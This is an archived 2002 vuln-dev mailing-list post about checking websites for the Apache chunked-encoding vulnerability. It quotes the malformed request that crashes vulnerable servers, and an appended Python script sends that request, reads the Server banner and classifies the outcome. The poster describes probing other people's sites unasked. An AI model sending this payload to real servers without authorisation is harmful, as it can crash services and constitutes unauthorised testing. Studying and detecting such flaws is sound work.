Apache vulnerability checking

From: Syzop (syz@dds.nl)
Date: 06/23/02


Date: Sun, 23 Jun 2002 12:00:34 +0200
From: Syzop <syz@dds.nl>
To: vuln-dev@securityfocus.com


Hi,

I've been checking sites for some time now with this
attached prog (and mailing the webmasters), what it does is send a:

--
GET /checkapache.html HTTP/1.0
Transfer-Encoding: chunked

999999999; a 0

-- request, and see what happens. Vulnerable Apache: crashes, so the connection is closed. Not vulnerable Apache: sends something back. IIS/some other things: wait for more data (?)

Anyway, I thought that when I'm sure it's an apache server ("Server: Apache blabla") and it crashes then it must be vulnerable. Is this always the case? This morning I received a mail from some admin who I had mailed and he told me they had already upgraded. Full server version: "Server: Apache/1.3.24 (Unix) (Red-Hat/Linux) mod_ssl/2.8.8 OpenSSL/0.9.6b mod_perl/1.26"

So my question is: has Red Hat changed something in the bad-chunked-encoding-detected behavior in their backport, or did this guy just forget to restart Apache?

Btw, there are some other "major sites" which do also drop the connection but I couldn't see if they were running apache servers. www.tucows.com / www.geocities.com / www.yahoo.com / etc They do respond to "good" chunked encoding requests. Anyway I didn't mail them since it could be some weird http server behavior.

Cya,

Bram Matthys
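The probe described in the message above, written out as an added example (this is not the poster's attached program, which is not on this page). It first sends a benign request to read the Server: banner, then sends the malformed chunked request and sorts the outcome into the three buckets the poster lists: connection dropped, some response, or silence. The fake server, its banner string, and the host/port values are constructed for illustration so the whole thing runs offline; the "suspicious" verdict is only the poster's heuristic (Apache banner plus dropped connection), which the message itself notes may misfire on a patched build.

```python
import socket
import socketserver
import threading

# The exact request from the message: a chunk-size line far larger than any
# 32-bit length, followed by no chunk data.
PROBE = (
    b"GET /checkapache.html HTTP/1.0\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"999999999; a 0\r\n"
)
BENIGN = b"GET / HTTP/1.0\r\n\r\n"


def _recv_or_classify(sock, timeout):
    """Return bytes received, b"" if the peer closed/reset, None on silence."""
    sock.settimeout(timeout)
    try:
        return sock.recv(4096)
    except socket.timeout:
        return None
    except ConnectionResetError:
        return b""


def server_header(host, port, timeout=5.0):
    """Send a benign request and return the Server: header value, or None."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(BENIGN)
        data = _recv_or_classify(s, timeout) or b""
    for line in data.split(b"\r\n"):
        if line.lower().startswith(b"server:"):
            return line.split(b":", 1)[1].strip().decode("latin-1")
    return None


def probe(host, port, timeout=5.0):
    """Send the malformed chunked request; return 'dropped', 'responds' or 'waits'."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(PROBE)
        data = _recv_or_classify(s, timeout)
    if data is None:
        return "waits"
    if data == b"":
        return "dropped"
    return "responds"


def classify(host, port, timeout=5.0):
    """Combine banner and probe the way the message does (heuristic only)."""
    banner = server_header(host, port, timeout)
    outcome = probe(host, port, timeout)
    suspicious = outcome == "dropped" and bool(banner) and banner.startswith("Apache")
    return {"server": banner, "probe": outcome, "suspicious": suspicious}


# --- constructed fake server with the three behaviours, for offline testing ---
class _FakeHandler(socketserver.BaseRequestHandler):
    def handle(self):
        head = b""
        while b"\r\n\r\n" not in head:
            chunk = self.request.recv(1024)
            if not chunk:
                return
            head += chunk
        banner = self.server.banner
        if b"transfer-encoding: chunked" not in head.lower():
            self.request.sendall(b"HTTP/1.0 200 OK\r\nServer: " + banner
                                 + b"\r\nContent-Length: 0\r\n\r\n")
            return
        if self.server.mode == "drop":      # mimic a crashed child: just close
            return
        if self.server.mode == "respond":   # mimic a server that rejects it
            self.request.sendall(b"HTTP/1.0 400 Bad Request\r\nServer: " + banner + b"\r\n\r\n")
            return
        # "hang": keep reading like a server still waiting for chunk data
        self.request.settimeout(self.server.hang_seconds)
        try:
            while self.request.recv(1024):
                pass
        except socket.timeout:
            pass


def start_fake_server(mode, banner=b"Apache/1.3.24 (Unix)", hang_seconds=2.0):
    """Start a local fake HTTP server; returns (server, port). Call server.shutdown() when done."""
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), _FakeHandler)
    srv.daemon_threads = True
    srv.mode, srv.banner, srv.hang_seconds = mode, banner, hang_seconds
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


if __name__ == "__main__":
    for mode in ("drop", "respond", "hang"):
        srv, port = start_fake_server(mode)
        try:
            print(mode, classify("127.0.0.1", port, timeout=0.5))
        finally:
            srv.shutdown()
            srv.server_close()
```

Against a real host you would call `classify(host, 80)`; the fake server only exists so the three classifications can be exercised without touching anyone else's machine.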



